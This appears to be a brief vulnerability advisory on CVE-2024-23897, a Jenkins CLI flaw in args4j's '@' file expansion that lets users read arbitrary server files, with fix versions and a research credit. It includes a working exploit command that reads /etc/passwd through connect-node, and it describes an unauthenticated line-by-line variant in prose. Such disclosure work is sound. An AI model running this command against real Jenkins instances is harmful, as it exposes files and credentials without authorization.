CVE-2024-23897

Data Leak Vulnerability

Fixed in: version 2.442 and LTS 2.426.3

Vulnerability Overview

Jenkins CLI contains a critical data exposure flaw. The vulnerability exploits how Jenkins processes command-line arguments through the args4j library's expandAtFiles function.

Technical Details

The vulnerable code path occurs when Jenkins invokes a CLI command with arguments. The args4j library's expandAtFiles method checks whether arguments begin with the @ symbol. When this character is detected, the system treats the following text as a file path and reads its contents, expanding each line as a separate argument.

This creates a security gap: "if an attacker can control an argument, they can expand it to an arbitrary number of ones from an arbitrary file on the Jenkins instance."

Exploitation Methods

For Authenticated Users: Attackers with valid credentials can retrieve complete file contents by passing file paths as arguments to CLI commands:

N/ABASH

java -jar jenkins-cli.jar -noCertificateCheck -s https://xxx.yyy/jenkins \
  -auth abc:abc connect-node "@/etc/passwd"

For Unauthenticated Users: Without credentials or proper permissions, attackers can still extract file data line-by-line using different commands that process arguments differently. Each command may output a different line from the targeted file.

Reference

This vulnerability disclosure credits SonarSource's security research.

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝